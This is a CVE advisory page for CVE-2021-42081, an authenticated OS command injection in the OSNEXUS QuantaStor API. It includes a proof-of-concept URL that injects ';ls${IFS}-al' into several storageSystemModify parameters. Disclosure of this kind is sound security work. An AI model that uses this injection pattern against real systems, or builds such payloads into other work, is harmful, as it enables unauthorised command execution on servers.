CVE-2021-42081
Authenticated Remote Command Execution vulnerability in OSNEXUS QuantaStor before 6.0.0.355
CVE | CVE-2021-42081 | |||||||||||
Title | Authenticated Remote Command Execution vulnerability in OSNEXUS QuantaStor before 6.0.0.355 | |||||||||||
Credits |
|
|||||||||||
Affected products |
|
|||||||||||
CVSS |
Base score:
9.1
(CRITICAL) |
|||||||||||
References |
|
|||||||||||
Problem type(s) | CWE-78 Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection') | |||||||||||
Date published | ||||||||||||
Last modified | 11 Mar 2025 13:39 UTC |
Description
An authenticated administrator is allowed to remotely execute arbitrary shell commands via the API.
POC
POC
http://<IP_ADDRESS>/qstorapi/storageSystemModify?storageSystem=&newName=quantastor&newDescription=;ls${IFS}-al&newLocation=4&newEnclosureLayoutId=5&newDnsServerList=;ls${IFS}-al&externalHostName=&newNTPServerList=;ls${IFS}-al
Solution(s)
Upgrade to the latest version of OSNEXUS QuantaStor.
JSON version.